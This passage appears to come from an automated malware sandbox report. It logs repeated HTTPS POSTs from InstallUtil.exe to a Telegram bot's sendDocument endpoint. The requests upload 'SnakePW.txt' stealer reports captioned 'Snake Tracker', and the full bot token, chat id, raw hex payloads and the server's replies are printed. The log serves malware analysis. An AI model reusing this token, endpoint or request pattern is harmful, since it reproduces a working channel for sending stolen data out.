                                                                                    Data Ascii: {"ok":true,"result":{"message_id":118,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765178


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.550004149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:19 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd35b104214840
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:19 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 62 31 30 34 32 31 34 38 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd35b104214840Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:19 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:19 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:19 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 39
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":119,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765179


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.550006149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:20 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd35bf32d241b0
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:20 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 62 66 33 32 64 32 34 31 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd35bf32d241b0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:20 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:20 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:20 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 30
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":120,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765180


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.550007149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:21 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd35cea4e5824e
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:21 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 63 65 61 34 65 35 38 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd35cea4e5824eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:21 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:21 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:21 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 31
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":121,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765181


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.550008149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:22 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd35de11d54d03
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:22 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 64 65 31 31 64 35 34 64 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd35de11d54d03Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:22 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:22 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:22 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 32
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":122,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765182


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.550009149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:23 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd35f14da71486
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:23 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 66 31 34 64 61 37 31 34 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd35f14da71486Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:23 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:23 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:23 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 33
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":123,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765183


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.550010149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:24 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3605c888a16e
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:24 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 30 35 63 38 38 38 61 31 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3605c888a16eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:24 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:24 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 523
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:24 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 34
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":124,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765184


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.550011149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:25 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd361a3a658359
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:25 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 31 61 33 61 36 35 38 33 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd361a3a658359Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:25 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:25 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:25 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 35
